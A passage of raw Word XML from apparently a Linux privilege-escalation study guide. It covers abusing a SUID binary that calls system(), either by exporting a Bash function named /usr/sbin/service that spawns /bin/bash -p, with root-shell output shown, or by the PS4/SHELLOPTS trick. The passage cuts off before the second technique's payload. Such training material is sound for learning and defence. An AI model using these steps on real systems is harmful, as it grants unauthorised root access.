        </w:rPr>
        <w:t xml:space="preserve">$ strace -v -f -e execve /usr/local/bin/suid-env2 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002156">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[pid 16729] execve("/bin/sh", ["sh", "-c", "/usr/sbin/service apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002157">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start"]...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optionally, we can also verify with ltrace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002159">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ ltrace /usr/local/bin/suid-env2 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/usr/sbin/service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This reveals that the system function is being used to execute the /usr/sbin/service program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify the version of Bash is lower than 4.2-048</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash --version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a Bash function with the name "/usr/sbin/service" and export the function:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002160">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ function /usr/sbin/service { /bin/bash -p; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002161">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ export –f /usr/sbin/service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002162">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute the SUID file for a root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002163">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002164">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@debian:~# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002165">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root) …</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002166">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002167">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002168">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k8h1ybv0rmis" w:id="290"/>
      <w:bookmarkEnd w:id="290"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing Shell Features (#2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002169">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000216A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Tib3rius SUID Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000216B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000216C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000216D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash Debugging:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000216E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1419"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash has a debugging mode which can be enabled with the –x command line option, or by modifying the SHELLOPTS environment variable to include xtrace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000216F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1419"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, SHELLOPTS is read only, however the env command allows SHELLOPTS to be set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002170">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1419"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debug statements. This variable can include an embedded command, which will execute every time it is shown</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002171">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002172">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1249"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a SUID file runs another program via Bash (e.g. by using system() ) these environment variables can be inherited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002173">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1249"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If an SUID file is being executed, this command will execute with the privileges of the file owner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002174">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1249"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In Bash versions 4.4 and above, the PS4 environment variable is not inherited by shells running as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002175">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002176">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002177">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find SUID/SGID files on the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002179">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suid-env2 file should execute with root user permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run strings on the SUID file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ strings /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002180">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002181">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The file could be trying to run the /usr/sbin/service program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002182">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can verify this with strace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002183">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ strace -v -f -e execve /usr/local/bin/suid-env2 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002184">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[pid 16729] execve("/bin/sh", ["sh", "-c", "/usr/sbin/service apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002185">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start"]...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002186">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optionally, we can also verify with ltrace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ ltrace /usr/local/bin/suid-env 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002188">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("service apache2 start"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002189">
      <w:pPr>
        <w:numPr>
